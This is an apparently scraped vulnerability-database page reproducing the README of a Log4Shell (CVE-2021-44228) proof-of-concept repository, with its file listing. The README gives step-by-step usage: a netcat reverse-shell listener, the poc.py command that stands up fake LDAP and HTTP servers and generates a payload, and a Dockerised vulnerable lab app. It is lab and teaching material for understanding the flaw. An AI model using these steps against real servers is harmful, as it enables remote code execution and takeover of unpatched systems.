来源

关联漏洞

介绍

# log4j-shell-poc
A Proof-Of-Concept for the recently found CVE-2021-44228 vulnerability. <br><br>
Recently there was a new vulnerability in log4j, a java logging library that is very widely used in the likes of elasticsearch, minecraft and numerous others.

In this repository there is an example vulnerable application and proof-of-concept (POC) exploit of it.

Proof-of-concept (POC)
----------------------

As a PoC there is a python file that automates the process. 

#### Requirements:
```bash
pip install -r requirements.txt
```
#### Usage:


* Start a netcat listener to accept reverse shell connection.<br>
```py
nc -lvnp 9001
```
* Launch the exploit.<br>
**Note:** For this to work, the extracted java archive has to be named: `jdk1.8.0_20`, and be in the same directory.
```py
$ python3 poc.py --userip localhost --webport 8000 --lport 9001

[!] CVE: CVE-2021-44228
[+] Exploit java class created success
[+] Setting up fake LDAP server
Listening on 0.0.0.0:1389
```

This script will setup the HTTP server and the LDAP server for you, and it will also create the payload that you can use to paste into the vulnerable parameter. After this, if everything went well, you should get a shell on the lport.

<br>


Vulnerable application
--------------------------

There is a Dockerfile with the vulnerable webapp. You can use this by following the steps below:
```c
1: docker build -t log4j-shell-poc .
2: docker run --network host log4j-shell-poc
```
Once it is running, you can access it on localhost:8080

<br>

Getting the Java version.
--------------------------------------

Oracle thankfully provides an archive for all previous java versions:<br>
[https://www.oracle.com/java/technologies/javase/javase8-archive-downloads.html](https://www.oracle.com/java/technologies/javase/javase8-archive-downloads.html).<br>
Scroll down to `8u20` and download the appropriate files for your operating system and hardware.
![Screenshot from 2021-12-11 00-09-25](https://user-images.githubusercontent.com/46561460/145655967-b5808b9f-d919-476f-9cbc-ed9eaff51585.png)

**Note:** You do need to make an account to be able to download the package.

Once you have downloaded and extracted the archive, you can find `java` and a few related binaries in `jdk1.8.0_20/bin`.<br>
**Note:** Make sure to extract the jdk folder into this repository with the same name in order for it to work.

```
❯ tar -xf jdk-8u20-linux-x64.tar.gz

❯ ./jdk1.8.0_20/bin/java -version
java version "1.8.0_20"
Java(TM) SE Runtime Environment (build 1.8.0_20-b26)
Java HotSpot(TM) 64-Bit Server VM (build 25.20-b23, mixed mode)
```

Disclaimer
----------
This repository is not intended to be a one-click exploit to CVE-2021-44228. The purpose of this project is to help people learn about this vulnerability, and perhaps test their own applications (however there are better applications for this purpose, ei: [https://log4shell.tools/](https://log4shell.tools/)).

文件快照

 [4.0K]  /data/pocs/1a620e065bc546e835e7918182508d82f602d2ba
├── [ 177]  Dockerfile
├── [1.0K]  LICENSE
├── [4.1K]  poc.py
├── [2.9K]  README.md
├── [  17]  requirements.txt
├── [4.0K]  target
│   ├── [1.8M]  log4shell-1.0-SNAPSHOT.war
│   └── [ 41M]  marshalsec-0.0.3-SNAPSHOT-all.jar
└── [4.0K]  vulnerable-application
    ├── [2.5K]  log4shell.iml
    ├── [2.2K]  pom.xml
    └── [4.0K]  src
        └── [4.0K]  main
            ├── [4.0K]  java
            │   └── [4.0K]  com
            │       └── [4.0K]  example
            │           └── [4.0K]  log4shell
            │               ├── [ 217]  log4j.java
            │               └── [1.2K]  LoginServlet.java
            └── [4.0K]  webapp
                ├── [2.4K]  index.jsp
                └── [4.0K]  WEB-INF
                    └── [ 304]  web.xml

10 directories, 13 files

备注